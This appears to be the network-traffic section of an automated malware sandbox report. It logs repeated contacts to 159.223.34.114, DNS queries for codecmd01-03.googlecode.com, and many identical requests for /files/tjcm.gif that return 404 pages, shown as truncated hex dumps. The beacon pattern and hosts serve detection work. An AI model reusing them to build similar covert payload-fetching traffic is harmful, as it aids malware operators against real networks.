                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: codecmd01.googlecode.com
                          Source: global trafficDNS traffic detected: DNS query: codecmd02.googlecode.com
                          Source: global trafficDNS traffic detected: DNS query: codecmd03.googlecode.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 